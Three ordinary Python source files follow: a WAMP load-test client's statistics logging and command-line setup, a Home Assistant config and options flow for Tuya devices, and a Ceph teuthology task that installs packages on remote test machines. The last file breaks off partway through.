payload_len=len(payload),
fp=hl(binascii.b2a_hex(fingerprint).decode(), color='green', bold=True))
d = gatherResults(dl)
try:
yield d
except TransportLost:
self.log.error('Transport lost!')
self.leave()
return
duration = (time_ns() - started) / 10**9
sleep_secs = (1 / float(self._rate)) - duration
if sleep_secs > 0:
yield sleep(sleep_secs)
loop += 1
def _stats(self, batch_id, log):
stats = self._pinfo.get_stats()
if self._last_stats:
batch_duration = (stats['time'] - self._last_stats['time']) / 10 ** 9
ctx = round((stats['voluntary'] - self._last_stats['voluntary']) / batch_duration, 0)
log('{logprefix}: {user} user, {system} system, {mem_percent} mem_percent, {ctx} ctx',
logprefix=hl('LOAD', color='white', bold=True),
user=stats['user'],
system=stats['system'],
mem_percent=round(stats['mem_percent'], 1),
ctx=ctx)
events_received_per_sec = int(round(self._received_cnt / batch_duration))
bytes_received_per_sec = int(round(self._received_bytes / batch_duration))
events_published_per_sec = int(round(self._published_cnt / batch_duration))
bytes_published_per_sec = int(round(self._published_bytes / batch_duration))
log('{logprefix}: {events_received} EVENTs received ({events_received_ff} forwarded), {events_received_per_sec}, {events_published} events published, {events_published_per_sec} events/second',
logprefix=hl('WAMP {}.*'.format(self._logname), color='white', bold=True),
events_received=self._received_cnt,
events_received_ff=self._received_ff_cnt,
events_received_per_sec=hl('{} events/second'.format(events_received_per_sec), color='white', bold=True),
bytes_received_per_sec=bytes_received_per_sec,
events_published=self._published_cnt,
events_published_per_sec=events_published_per_sec,
bytes_published_per_sec=bytes_published_per_sec)
calls_received_per_sec = int(round(self._received_calls_cnt / batch_duration))
call_bytes_received_per_sec = int(round(self._received_calls_bytes / batch_duration))
calls_issued_per_sec = int(round(self._calls_cnt / batch_duration))
call_bytes_issued_per_sec = int(round(self._calls_bytes / batch_duration))
log('{logprefix}: {calls_received} INVOCATIONs received ({calls_received_ff} forwarded), {calls_received_per_sec}, {calls_issued} calls issued, {calls_issued_per_sec} calls/second',
logprefix=hl('WAMP {}.*'.format(self._logname), color='white', bold=True),
calls_received=self._received_calls_cnt,
calls_received_ff=self._received_calls_ff_cnt,
calls_received_per_sec=hl('{} calls/second'.format(calls_received_per_sec), color='white', bold=True),
call_bytes_received_per_sec=call_bytes_received_per_sec,
calls_issued=self._calls_cnt,
calls_issued_per_sec=calls_issued_per_sec,
call_bytes_issued_per_sec=call_bytes_issued_per_sec)
self._received_cnt = 0
self._received_bytes = 0
self._received_ff_cnt = 0
self._published_cnt = 0
self._published_bytes = 0
self._received_calls_cnt = 0
self._received_calls_bytes = 0
self._received_calls_ff_cnt = 0
self._calls_cnt = 0
self._calls_bytes = 0
self._last_stats = stats
class HATestClient(object):
def __init__(self, reactor, urls, realm, extra):
self._reactor = reactor
self._urls = urls
self._realm = realm
self._extra = extra
self._runners = {}
def start(self):
dl = []
for url in self._urls:
extra = copy.deepcopy(self._extra)
extra['url'] = url
runner = ApplicationRunner(url=url, realm=self._realm, extra=extra)
self._runners[url] = runner
d = runner.run(HATestClientSession, auto_reconnect=True, start_reactor=False, reactor=self._reactor)
dl.append(d)
return gatherResults(dl)
def stop(self):
dl = []
for runner in self._runners.values():
d = runner.stop()
dl.append(d)
return gatherResults(dl)
@inlineCallbacks
def main(reactor, config, logname, url, realm, connections, loops, rate, stride, size, period, duration, silent):
if url:
urls = [url]
else:
urls = []
for node in config.sections():
url = config[node].get('url', None)
if url:
urls.append(url)
pprint(urls)
extra = {
'period': period,
'loops': loops,
'rate': rate,
'stride': stride,
'size': size,
'silent': silent,
}
clients = []
dl = []
for i in range(connections):
_extra = copy.deepcopy(extra)
_extra['logname'] = '{}.{}'.format(logname, i)
client = HATestClient(reactor, urls, realm, _extra)
clients.append(client)
d = client.start()
dl.append(d)
yield gatherResults(dl)
yield sleep(duration)
dl = []
for client in clients:
d = client.stop()
dl.append(d)
yield gatherResults(dl)
if __name__ == '__main__':
print('Client with PID {} starting ..'.format(hl(os.getpid(), bold=True)))
parser = argparse.ArgumentParser()
parser.add_argument('-d',
'--debug',
action='store_true',
help='Enable debug output (set log level "debug").')
parser.add_argument('--config',
dest='config',
type=str,
default='client.ini',
help='Client WAMP router connections configuration.')
parser.add_argument('-s',
'--silent',
action='store_true',
help='Silent mode (set log level "warn").')
parser.add_argument('--logname',
dest='logname',
type=str,
default='client0',
help='Log name to use (default: "publisher0").')
parser.add_argument('--url',
dest='url',
type=str,
default=None,
help='The proxied router URL or None for connecting directly to nodes.')
parser.add_argument('--realm',
dest='realm',
type=str,
default="realm1",
help='The realm to join (default: "realm1").')
parser.add_argument('--connections',
dest='connections',
type=int,
default=1,
help='Number of connections to open (default: 1).')
parser.add_argument('--duration',
dest='duration',
type=int,
default=60,
help='Test duration in seconds (default: 60).')
parser.add_argument('--period',
dest='period',
type=int,
default=10,
help='Publishing session logging period in seconds (default: 10).')
parser.add_argument('--loops',
dest='loops',
type=int,
default=1,
help='Number of publishing loops per connections to run (default: 1).')
parser.add_argument('--rate',
dest='rate',
type=float,
default=1.,
help='Publishing (nominal) loop rate in Hz (default: 1).')
parser.add_argument('--stride',
dest='stride',
type=int,
default=1,
help='Number of events to publish per loop iteration (default: 1).')
parser.add_argument('--size',
dest='size',
type=int,
default=256,
help='Event application payload size in bytes (default: 256).')
args = parser.parse_args()
if args.silent:
txaio.start_logging(level='warn')
elif args.debug:
txaio.start_logging(level='debug')
else:
txaio.start_logging(level='info')
log = txaio.make_logger()
config = configparser.ConfigParser()
with open(args.config) as f:
config.read_file(f)
sys.exit(react(main, (config,
args.logname,
args.url,
args.realm,
args.connections,
args.loops,
args.rate,
args.stride,
args.size,
args.period,
args.duration,
args.silent)))
|
|
"""Config flow for Tuya."""
from __future__ import annotations
import logging
from typing import Any
from tuyaha import TuyaApi
from tuyaha.tuyaapi import (
TuyaAPIException,
TuyaAPIRateLimitException,
TuyaNetException,
TuyaServerException,
)
import voluptuous as vol
from homeassistant import config_entries
from homeassistant.const import (
CONF_PASSWORD,
CONF_PLATFORM,
CONF_UNIT_OF_MEASUREMENT,
CONF_USERNAME,
ENTITY_MATCH_NONE,
TEMP_CELSIUS,
TEMP_FAHRENHEIT,
)
from homeassistant.core import callback
import homeassistant.helpers.config_validation as cv
from .const import (
CONF_BRIGHTNESS_RANGE_MODE,
CONF_COUNTRYCODE,
CONF_CURR_TEMP_DIVIDER,
CONF_DISCOVERY_INTERVAL,
CONF_MAX_KELVIN,
CONF_MAX_TEMP,
CONF_MIN_KELVIN,
CONF_MIN_TEMP,
CONF_QUERY_DEVICE,
CONF_QUERY_INTERVAL,
CONF_SET_TEMP_DIVIDED,
CONF_SUPPORT_COLOR,
CONF_TEMP_DIVIDER,
CONF_TEMP_STEP_OVERRIDE,
CONF_TUYA_MAX_COLTEMP,
DEFAULT_DISCOVERY_INTERVAL,
DEFAULT_QUERY_INTERVAL,
DEFAULT_TUYA_MAX_COLTEMP,
DOMAIN,
TUYA_DATA,
TUYA_PLATFORMS,
TUYA_TYPE_NOT_QUERY,
)
_LOGGER = logging.getLogger(__name__)
CONF_LIST_DEVICES = "list_devices"
DATA_SCHEMA_USER = vol.Schema(
{
vol.Required(CONF_USERNAME): str,
vol.Required(CONF_PASSWORD): str,
vol.Required(CONF_COUNTRYCODE): vol.Coerce(int),
vol.Required(CONF_PLATFORM): vol.In(TUYA_PLATFORMS),
}
)
ERROR_DEV_MULTI_TYPE = "dev_multi_type"
ERROR_DEV_NOT_CONFIG = "dev_not_config"
ERROR_DEV_NOT_FOUND = "dev_not_found"
RESULT_AUTH_FAILED = "invalid_auth"
RESULT_CONN_ERROR = "cannot_connect"
RESULT_SINGLE_INSTANCE = "single_instance_allowed"
RESULT_SUCCESS = "success"
RESULT_LOG_MESSAGE = {
RESULT_AUTH_FAILED: "Invalid credential",
RESULT_CONN_ERROR: "Connection error",
}
TUYA_TYPE_CONFIG = ["climate", "light"]
class TuyaConfigFlow(config_entries.ConfigFlow, domain=DOMAIN):
"""Handle a tuya config flow."""
VERSION = 1
def __init__(self) -> None:
"""Initialize flow."""
self._country_code = None
self._password = None
self._platform = None
self._username = None
def _save_entry(self):
return self.async_create_entry(
title=self._username,
data={
CONF_COUNTRYCODE: self._country_code,
CONF_PASSWORD: self._password,
CONF_PLATFORM: self._platform,
CONF_USERNAME: self._username,
},
)
def _try_connect(self):
"""Try to connect and check auth."""
tuya = TuyaApi()
try:
tuya.init(
self._username, self._password, self._country_code, self._platform
)
except (TuyaAPIRateLimitException, TuyaNetException, TuyaServerException):
return RESULT_CONN_ERROR
except TuyaAPIException:
return RESULT_AUTH_FAILED
return RESULT_SUCCESS
async def async_step_user(self, user_input=None):
"""Handle a flow initialized by the user."""
if self._async_current_entries():
return self.async_abort(reason=RESULT_SINGLE_INSTANCE)
errors = {}
if user_input is not None:
self._country_code = str(user_input[CONF_COUNTRYCODE])
self._password = user_input[CONF_PASSWORD]
self._platform = user_input[CONF_PLATFORM]
self._username = user_input[CONF_USERNAME]
result = await self.hass.async_add_executor_job(self._try_connect)
if result == RESULT_SUCCESS:
return self._save_entry()
if result != RESULT_AUTH_FAILED:
return self.async_abort(reason=result)
errors["base"] = result
return self.async_show_form(
step_id="user", data_schema=DATA_SCHEMA_USER, errors=errors
)
@staticmethod
@callback
def async_get_options_flow(config_entry):
"""Get the options flow for this handler."""
return OptionsFlowHandler(config_entry)
class OptionsFlowHandler(config_entries.OptionsFlow):
"""Handle a option flow for Tuya."""
def __init__(self, config_entry: config_entries.ConfigEntry) -> None:
"""Initialize options flow."""
self.config_entry = config_entry
self._conf_devs_id = None
self._conf_devs_option: dict[str, Any] = {}
self._form_error = None
def _get_form_error(self):
"""Set the error to be shown in the options form."""
errors = {}
if self._form_error:
errors["base"] = self._form_error
self._form_error = None
return errors
def _get_tuya_devices_filtered(self, types, exclude_mode=False, type_prefix=True):
"""Get the list of Tuya device to filtered by types."""
config_list = {}
types_filter = set(types)
tuya = self.hass.data[DOMAIN][TUYA_DATA]
devices_list = tuya.get_all_devices()
for device in devices_list:
dev_type = device.device_type()
exclude = (
dev_type in types_filter
if exclude_mode
else dev_type not in types_filter
)
if exclude:
continue
dev_id = device.object_id()
if type_prefix:
dev_id = f"{dev_type}-{dev_id}"
config_list[dev_id] = f"{device.name()} ({dev_type})"
return config_list
def _get_device(self, dev_id):
"""Get specific device from tuya library."""
tuya = self.hass.data[DOMAIN][TUYA_DATA]
return tuya.get_device_by_id(dev_id)
def _save_config(self, data):
"""Save the updated options."""
curr_conf = self.config_entry.options.copy()
curr_conf.update(data)
curr_conf.update(self._conf_devs_option)
return self.async_create_entry(title="", data=curr_conf)
async def _async_device_form(self, devs_id):
"""Return configuration form for devices."""
conf_devs_id = []
for count, dev_id in enumerate(devs_id):
device_info = dev_id.split("-")
if count == 0:
device_type = device_info[0]
device_id = device_info[1]
elif device_type != device_info[0]:
self._form_error = ERROR_DEV_MULTI_TYPE
return await self.async_step_init()
conf_devs_id.append(device_info[1])
device = self._get_device(device_id)
if not device:
self._form_error = ERROR_DEV_NOT_FOUND
return await self.async_step_init()
curr_conf = self._conf_devs_option.get(
device_id, self.config_entry.options.get(device_id, {})
)
config_schema = self._get_device_schema(device_type, curr_conf, device)
if not config_schema:
self._form_error = ERROR_DEV_NOT_CONFIG
return await self.async_step_init()
self._conf_devs_id = conf_devs_id
device_name = (
"(multiple devices selected)" if len(conf_devs_id) > 1 else device.name()
)
return self.async_show_form(
step_id="device",
data_schema=config_schema,
description_placeholders={
"device_type": device_type,
"device_name": device_name,
},
)
async def async_step_init(self, user_input=None):
"""Handle options flow."""
if self.config_entry.state is not config_entries.ConfigEntryState.LOADED:
_LOGGER.error("Tuya integration not yet loaded")
return self.async_abort(reason=RESULT_CONN_ERROR)
if user_input is not None:
dev_ids = user_input.get(CONF_LIST_DEVICES)
if dev_ids:
return await self.async_step_device(None, dev_ids)
user_input.pop(CONF_LIST_DEVICES, [])
return self._save_config(data=user_input)
data_schema = vol.Schema(
{
vol.Optional(
CONF_DISCOVERY_INTERVAL,
default=self.config_entry.options.get(
CONF_DISCOVERY_INTERVAL, DEFAULT_DISCOVERY_INTERVAL
),
): vol.All(vol.Coerce(int), vol.Clamp(min=30, max=900)),
}
)
query_devices = self._get_tuya_devices_filtered(
TUYA_TYPE_NOT_QUERY, True, False
)
if query_devices:
devices = {ENTITY_MATCH_NONE: "Default"}
devices.update(query_devices)
def_val = self.config_entry.options.get(CONF_QUERY_DEVICE)
if not def_val or not query_devices.get(def_val):
def_val = ENTITY_MATCH_NONE
data_schema = data_schema.extend(
{
vol.Optional(
CONF_QUERY_INTERVAL,
default=self.config_entry.options.get(
CONF_QUERY_INTERVAL, DEFAULT_QUERY_INTERVAL
),
): vol.All(vol.Coerce(int), vol.Clamp(min=30, max=240)),
vol.Optional(CONF_QUERY_DEVICE, default=def_val): vol.In(devices),
}
)
config_devices = self._get_tuya_devices_filtered(TUYA_TYPE_CONFIG, False, True)
if config_devices:
data_schema = data_schema.extend(
{vol.Optional(CONF_LIST_DEVICES): cv.multi_select(config_devices)}
)
return self.async_show_form(
step_id="init",
data_schema=data_schema,
errors=self._get_form_error(),
)
async def async_step_device(self, user_input=None, dev_ids=None):
"""Handle options flow for device."""
if dev_ids is not None:
return await self._async_device_form(dev_ids)
if user_input is not None:
for device_id in self._conf_devs_id:
self._conf_devs_option[device_id] = user_input
return await self.async_step_init()
def _get_device_schema(self, device_type, curr_conf, device):
"""Return option schema for device."""
if device_type != device.device_type():
return None
schema = None
if device_type == "light":
schema = self._get_light_schema(curr_conf, device)
elif device_type == "climate":
schema = self._get_climate_schema(curr_conf, device)
return schema
@staticmethod
def _get_light_schema(curr_conf, device):
"""Create option schema for light device."""
min_kelvin = device.max_color_temp()
max_kelvin = device.min_color_temp()
config_schema = vol.Schema(
{
vol.Optional(
CONF_SUPPORT_COLOR,
default=curr_conf.get(CONF_SUPPORT_COLOR, False),
): bool,
vol.Optional(
CONF_BRIGHTNESS_RANGE_MODE,
default=curr_conf.get(CONF_BRIGHTNESS_RANGE_MODE, 0),
): vol.In({0: "Range 1-255", 1: "Range 10-1000"}),
vol.Optional(
CONF_MIN_KELVIN,
default=curr_conf.get(CONF_MIN_KELVIN, min_kelvin),
): vol.All(vol.Coerce(int), vol.Clamp(min=min_kelvin, max=max_kelvin)),
vol.Optional(
CONF_MAX_KELVIN,
default=curr_conf.get(CONF_MAX_KELVIN, max_kelvin),
): vol.All(vol.Coerce(int), vol.Clamp(min=min_kelvin, max=max_kelvin)),
vol.Optional(
CONF_TUYA_MAX_COLTEMP,
default=curr_conf.get(
CONF_TUYA_MAX_COLTEMP, DEFAULT_TUYA_MAX_COLTEMP
),
): vol.All(
vol.Coerce(int),
vol.Clamp(
min=DEFAULT_TUYA_MAX_COLTEMP, max=DEFAULT_TUYA_MAX_COLTEMP * 10
),
),
}
)
return config_schema
@staticmethod
def _get_climate_schema(curr_conf, device):
"""Create option schema for climate device."""
unit = device.temperature_unit()
def_unit = TEMP_FAHRENHEIT if unit == "FAHRENHEIT" else TEMP_CELSIUS
supported_steps = device.supported_temperature_steps()
default_step = device.target_temperature_step()
config_schema = vol.Schema(
{
vol.Optional(
CONF_UNIT_OF_MEASUREMENT,
default=curr_conf.get(CONF_UNIT_OF_MEASUREMENT, def_unit),
): vol.In({TEMP_CELSIUS: "Celsius", TEMP_FAHRENHEIT: "Fahrenheit"}),
vol.Optional(
CONF_TEMP_DIVIDER,
default=curr_conf.get(CONF_TEMP_DIVIDER, 0),
): vol.All(vol.Coerce(int), vol.Clamp(min=0)),
vol.Optional(
CONF_CURR_TEMP_DIVIDER,
default=curr_conf.get(CONF_CURR_TEMP_DIVIDER, 0),
): vol.All(vol.Coerce(int), vol.Clamp(min=0)),
vol.Optional(
CONF_SET_TEMP_DIVIDED,
default=curr_conf.get(CONF_SET_TEMP_DIVIDED, True),
): bool,
vol.Optional(
CONF_TEMP_STEP_OVERRIDE,
default=curr_conf.get(CONF_TEMP_STEP_OVERRIDE, default_step),
): vol.In(supported_steps),
vol.Optional(
CONF_MIN_TEMP,
default=curr_conf.get(CONF_MIN_TEMP, 0),
): int,
vol.Optional(
CONF_MAX_TEMP,
default=curr_conf.get(CONF_MAX_TEMP, 0),
): int,
}
)
return config_schema
|
|
from cStringIO import StringIO
import contextlib
import copy
import logging
import time
import os
import subprocess
from teuthology.config import config as teuth_config
from teuthology import misc as teuthology
from teuthology import contextutil, packaging
from teuthology.exceptions import VersionNotFoundError
from teuthology.parallel import parallel
from ..orchestra import run
log = logging.getLogger(__name__)
# Should the RELEASE value get extracted from somewhere?
RELEASE = "1-0"
# This is intended to be a complete listing of ceph packages. If we're going
# to hardcode this stuff, I don't want to do it in more than once place.
PACKAGES = {}
PACKAGES['ceph'] = {}
PACKAGES['ceph']['deb'] = [
'ceph',
# 'ceph-dbg',
'ceph-mds',
# 'ceph-mds-dbg',
'ceph-common',
# 'ceph-common-dbg',
'ceph-fuse',
# 'ceph-fuse-dbg',
'ceph-test',
# 'ceph-test-dbg',
'radosgw',
# 'radosgw-dbg',
'python-ceph',
'libcephfs1',
# 'libcephfs1-dbg',
'libcephfs-java',
'libcephfs-jni',
'librados2',
# 'librados2-dbg',
'librbd1',
# 'librbd1-dbg',
'rbd-fuse',
'qemu',
]
PACKAGES['ceph']['rpm'] = [
# 'ceph-debuginfo',
'ceph-radosgw',
'ceph-test',
'ceph-devel',
'ceph',
'ceph-fuse',
'cephfs-java',
'rest-bench',
'libcephfs_jni1',
'libcephfs1',
'librados2',
'librbd1',
'python-ceph',
'rbd-fuse',
'qemu',
]
def _get_config_value_for_remote(ctx, remote, config, key):
"""
Look through config, and attempt to determine the "best" value to use for a
given key. For example, given:
config = {
'all':
{'branch': 'master'},
'branch': 'next'
}
_get_config_value_for_remote(ctx, remote, config, 'branch')
would return 'master'.
:param ctx: the argparse.Namespace object
:param remote: the teuthology.orchestra.remote.Remote object
:param config: the config dict
:param key: the name of the value to retrieve
"""
roles = ctx.cluster.remotes[remote]
if 'all' in config:
return config['all'].get(key)
elif roles:
for role in roles:
if role in config and key in config[role]:
return config[role].get(key)
return config.get(key)
def _get_uri(tag, branch, sha1):
"""
Set the uri -- common code used by both install and debian upgrade
"""
uri = None
if tag:
uri = 'ref/' + tag
elif branch:
uri = 'ref/' + branch
elif sha1:
uri = 'sha1/' + sha1
else:
# FIXME: Should master be the default?
log.debug("defaulting to master branch")
uri = 'ref/master'
return uri
def _get_baseurlinfo_and_dist(ctx, remote, config):
"""
Through various commands executed on the remote, determines the
distribution name and version in use, as well as the portion of the repo
URI to use to specify which version of the project (normally ceph) to
install.Example:
{'arch': 'x86_64',
'dist': 'raring',
'dist_release': None,
'distro': 'Ubuntu',
'distro_release': None,
'flavor': 'basic',
'relval': '13.04',
'uri': 'ref/master'}
:param ctx: the argparse.Namespace object
:param remote: the teuthology.orchestra.remote.Remote object
:param config: the config dict
:returns: dict -- the information you want.
"""
retval = {}
relval = None
r = remote.run(
args=['arch'],
stdout=StringIO(),
)
retval['arch'] = r.stdout.getvalue().strip()
r = remote.run(
args=['lsb_release', '-is'],
stdout=StringIO(),
)
retval['distro'] = r.stdout.getvalue().strip()
r = remote.run(
args=[
'lsb_release', '-rs'], stdout=StringIO())
retval['relval'] = r.stdout.getvalue().strip()
dist_name = None
if retval['distro'] == 'CentOS':
relval = retval['relval']
relval = relval[0:relval.find('.')]
distri = 'centos'
retval['distro_release'] = '%s%s' % (distri, relval)
retval['dist'] = retval['distro_release']
dist_name = 'el'
retval['dist_release'] = '%s%s' % (dist_name, relval)
elif retval['distro'] == 'RedHatEnterpriseServer':
relval = retval['relval'].replace('.', '_')
distri = 'rhel'
retval['distro_release'] = '%s%s' % (distri, relval)
retval['dist'] = retval['distro_release']
dist_name = 'el'
short_relval = relval[0:relval.find('_')]
retval['dist_release'] = '%s%s' % (dist_name, short_relval)
elif retval['distro'] == 'Fedora':
distri = retval['distro']
dist_name = 'fc'
retval['distro_release'] = '%s%s' % (dist_name, retval['relval'])
retval['dist'] = retval['dist_release'] = retval['distro_release']
else:
r = remote.run(
args=['lsb_release', '-sc'],
stdout=StringIO(),
)
retval['dist'] = r.stdout.getvalue().strip()
retval['distro_release'] = None
retval['dist_release'] = None
# branch/tag/sha1 flavor
retval['flavor'] = config.get('flavor', 'basic')
log.info('config is %s', config)
tag = _get_config_value_for_remote(ctx, remote, config, 'tag')
branch = _get_config_value_for_remote(ctx, remote, config, 'branch')
sha1 = _get_config_value_for_remote(ctx, remote, config, 'sha1')
uri = _get_uri(tag, branch, sha1)
retval['uri'] = uri
return retval
def _get_baseurl(ctx, remote, config):
"""
Figures out which package repo base URL to use.
Example:
'http://gitbuilder.ceph.com/ceph-deb-raring-x86_64-basic/ref/master'
:param ctx: the argparse.Namespace object
:param remote: the teuthology.orchestra.remote.Remote object
:param config: the config dict
:returns: str -- the URL
"""
# get distro name and arch
baseparms = _get_baseurlinfo_and_dist(ctx, remote, config)
base_url = 'http://{host}/{proj}-{pkg_type}-{dist}-{arch}-{flavor}/{uri}'.format(
host=teuth_config.gitbuilder_host,
proj=config.get('project', 'ceph'),
pkg_type=remote.system_type,
**baseparms
)
return base_url
def _block_looking_for_package_version(remote, base_url, wait=False):
"""
Look for, and parse, a file called 'version' in base_url.
:param remote: the teuthology.orchestra.remote.Remote object
:param wait: wait forever for the file to show up. (default False)
:returns: str -- the version e.g. '0.67-240-g67a95b9-1raring'
:raises: VersionNotFoundError
"""
while True:
r = remote.run(
args=['wget', '-q', '-O-', base_url + '/version'],
stdout=StringIO(),
check_status=False,
)
if r.exitstatus != 0:
if wait:
log.info('Package not there yet, waiting...')
time.sleep(15)
continue
raise VersionNotFoundError(base_url)
break
version = r.stdout.getvalue().strip()
# FIXME: 'version' as retreived from the repo is actually the RPM version
# PLUS *part* of the release. Example:
# Right now, ceph master is given the following version in the repo file:
# v0.67-rc3.164.gd5aa3a9 - whereas in reality the RPM version is 0.61.7
# and the release is 37.g1243c97.el6 (for centos6).
# Point being, I have to mangle a little here.
if version[0] == 'v':
version = version[1:]
if '-' in version:
version = version.split('-')[0]
return version
def _get_local_dir(config, remote):
"""
Extract local directory name from the task lists.
Copy files over to the remote site.
"""
ldir = config.get('local', None)
if ldir:
remote.run(args=['sudo', 'mkdir', '-p', ldir,])
for fyle in os.listdir(ldir):
fname = "%s/%s" % (ldir, fyle)
teuthology.sudo_write_file(remote, fname, open(fname).read(), '644')
return ldir
def _update_deb_package_list_and_install(ctx, remote, debs, config):
"""
Runs ``apt-get update`` first, then runs ``apt-get install``, installing
the requested packages on the remote system.
TODO: split this into at least two functions.
:param ctx: the argparse.Namespace object
:param remote: the teuthology.orchestra.remote.Remote object
:param debs: list of packages names to install
:param config: the config dict
"""
# # check for ceph release key
# r = remote.run(
# args=[
# 'sudo', 'apt-key', 'list', run.Raw('|'), 'grep', 'Ceph',
# ],
# stdout=StringIO(),
# check_status=False,
# )
# if r.stdout.getvalue().find('Ceph automated package') == -1:
# # if it doesn't exist, add it
# remote.run(
# args=[
# 'wget', '-q', '-O-',
# 'https://ceph.com/git/?p=ceph.git;a=blob_plain;f=keys/autobuild.asc',
# run.Raw('|'),
# 'sudo', 'apt-key', 'add', '-',
# ],
# stdout=StringIO(),
# )
#
# baseparms = _get_baseurlinfo_and_dist(ctx, remote, config)
# log.info("Installing packages: {pkglist} on remote deb {arch}".format(
# pkglist=", ".join(debs), arch=baseparms['arch'])
# )
# # get baseurl
# base_url = _get_baseurl(ctx, remote, config)
# log.info('Pulling from %s', base_url)
#
# # get package version string
# # FIXME this is a terrible hack.
# while True:
# r = remote.run(
# args=[
# 'wget', '-q', '-O-', base_url + '/version',
# ],
# stdout=StringIO(),
# check_status=False,
# )
# if r.exitstatus != 0:
# if config.get('wait_for_package'):
# log.info('Package not there yet, waiting...')
# time.sleep(15)
# continue
# raise VersionNotFoundError("%s/version" % base_url)
# version = r.stdout.getvalue().strip()
# log.info('Package version is %s', version)
# break
#
# remote.run(
# args=[
# 'echo', 'deb', base_url, baseparms['dist'], 'main',
# run.Raw('|'),
# 'sudo', 'tee', '/etc/apt/sources.list.d/{proj}.list'.format(
# proj=config.get('project', 'ceph')),
# ],
# stdout=StringIO(),
# )
remote.run(args=['sudo', 'apt-get', 'update'], check_status=False)
remote.run(
args=[
'sudo', 'DEBIAN_FRONTEND=noninteractive', 'apt-get', '-y', '--force-yes',
'-o', run.Raw('Dpkg::Options::="--force-confdef"'), '-o', run.Raw(
'Dpkg::Options::="--force-confold"'),
'install',
] + ['%s' % (d) for d in debs],
)
# ldir = _get_local_dir(config, remote)
# if ldir:
# for fyle in os.listdir(ldir):
# fname = "%s/%s" % (ldir, fyle)
# remote.run(args=['sudo', 'dpkg', '-i', fname],)
#
def _yum_fix_repo_priority(remote, project, uri):
"""
On the remote, 'priority=1' lines to each enabled repo in:
/etc/yum.repos.d/{project}.repo
:param remote: the teuthology.orchestra.remote.Remote object
:param project: the project whose repos need modification
"""
repo_path = '/etc/yum.repos.d/%s.repo' % project
remote.run(
args=[
'if', 'test', '-f', repo_path, run.Raw(';'), 'then',
'sudo', 'sed', '-i', '-e',
run.Raw('\':a;N;$!ba;s/enabled=1\\ngpg/enabled=1\\npriority=1\\ngpg/g\''),
'-e',
run.Raw("'s;ref/[a-zA-Z0-9_-]*/;{uri}/;g'".format(uri=uri)),
repo_path, run.Raw(';'), 'fi'
]
)
def _yum_fix_repo_host(remote, project):
"""
Update the hostname to reflect the gitbuilder_host setting.
"""
old_host = teuth_config._defaults['gitbuilder_host']
new_host = teuth_config.gitbuilder_host
if new_host == old_host:
return
repo_path = '/etc/yum.repos.d/%s.repo' % project
host_sed_expr = "'s/{0}/{1}/'".format(old_host, new_host)
remote.run(
args=[
'if', 'test', '-f', repo_path, run.Raw(';'), 'then',
'sudo', 'sed', '-i', '-e', run.Raw(host_sed_expr),
repo_path, run.Raw(';'), 'fi']
)
def _yum_set_check_obsoletes(remote):
"""
Set check_obsoletes = 1 in /etc/yum/pluginconf.d/priorities.conf
Creates a backup at /etc/yum/pluginconf.d/priorities.conf.orig so we can
restore later.
"""
conf_path = '/etc/yum/pluginconf.d/priorities.conf'
conf_path_orig = conf_path + '.orig'
remote.run(args=['sudo', 'cp', '-af', conf_path, conf_path_orig])
remote.run(args=['echo', 'check_obsoletes = 1', run.Raw('|'),
'sudo', 'tee', '-a', conf_path])
def _yum_unset_check_obsoletes(remote):
"""
Restore the /etc/yum/pluginconf.d/priorities.conf backup
"""
conf_path = '/etc/yum/pluginconf.d/priorities.conf'
conf_path_orig = conf_path + '.orig'
remote.run(args=['sudo', 'mv', '-f', conf_path_orig, conf_path],
check_status=False)
def _update_rpm_package_list_and_install(ctx, remote, rpm, config):
"""
Installs the ceph-release package for the relevant branch, then installs
the requested packages on the remote system.
TODO: split this into at least two functions.
:param ctx: the argparse.Namespace object
:param remote: the teuthology.orchestra.remote.Remote object
:param rpm: list of packages names to install
:param config: the config dict
"""
baseparms = _get_baseurlinfo_and_dist(ctx, remote, config)
log.info("Installing packages: {pkglist} on remote rpm {arch}".format(
pkglist=", ".join(rpm), arch=baseparms['arch']))
host = teuth_config.gitbuilder_host
dist_release = baseparms['dist_release']
project = config.get('project', 'ceph')
start_of_url = 'http://{host}/{proj}-rpm-{distro_release}-{arch}-{flavor}/{uri}'.format(
proj=project, host=host, **baseparms)
proj_release = '{proj}-release-{release}.{dist_release}.noarch'.format(
proj=project, release=RELEASE, dist_release=dist_release)
rpm_name = "{rpm_nm}.rpm".format(rpm_nm=proj_release)
base_url = "{start_of_url}/noarch/{rpm_name}".format(
start_of_url=start_of_url, rpm_name=rpm_name)
# When this was one command with a pipe, it would sometimes
# fail with the message 'rpm: no packages given for install'
#remote.run(args=['wget', base_url, ],)
remote.run(args=['sudo', 'yum', '-y', 'localinstall', rpm_name])
remote.run(args=['rm', '-f', rpm_name])
uri = baseparms['uri']
#_yum_fix_repo_priority(remote, project, uri)
#_yum_fix_repo_host(remote, project)
#_yum_set_check_obsoletes(remote)
remote.run(
args=[
'sudo', 'yum', 'clean', 'all',
])
ldir = _get_local_dir(config, remote)
for cpack in rpm:
pkg = None
if ldir:
pkg = "{ldir}/{cpack}".format(
ldir=ldir,
cpack=cpack,
)
remote.run(
args = ['if', 'test', '-e',
run.Raw(pkg), run.Raw(';'), 'then',
'sudo', 'yum', 'remove', pkg, '-y', run.Raw(';'),
'sudo', 'yum', 'install', pkg, '-y',
run.Raw(';'), 'fi']
)
if pkg is None:
remote.run(args=['sudo', 'yum', 'install', cpack, '-y'])
else:
remote.run(
args = ['if', 'test', run.Raw('!'), '-e',
run.Raw(pkg), run.Raw(';'), 'then',
'sudo', 'yum', 'install', cpack, '-y',
run.Raw(';'), 'fi'])
def verify_package_version(ctx, config, remote):
"""
Ensures that the version of package installed is what
was asked for in the config.
For most cases this is for ceph, but we also install samba
for example.
"""
# Do not verify the version if the ceph-deploy task is being used to
# install ceph. Verifying the ceph installed by ceph-deploy should work,
# but the qa suites will need reorganized first to run ceph-deploy
# before the install task.
# see: http://tracker.ceph.com/issues/11248
if config.get("extras"):
log.info("Skipping version verification...")
return True
base_url = _get_baseurl(ctx, remote, config)
version = _block_looking_for_package_version(
remote,
base_url,
config.get('wait_for_package', False)
)
pkg_to_check = config.get('project', 'ceph')
installed_ver = packaging.get_package_version(remote, pkg_to_check)
if installed_ver and version in installed_ver:
msg = "The correct {pkg} version {ver} is installed.".format(
ver=version,
pkg=pkg_to_check
)
log.info(msg)
else:
raise RuntimeError(
"{pkg} version {ver} was not installed, found {installed}.".format(
ver=version,
installed=installed_ver,
pkg=pkg_to_check
)
)
def purge_data(ctx):
"""
Purge /var/lib/ceph on every remote in ctx.
:param ctx: the argparse.Namespace object
"""
with parallel() as p:
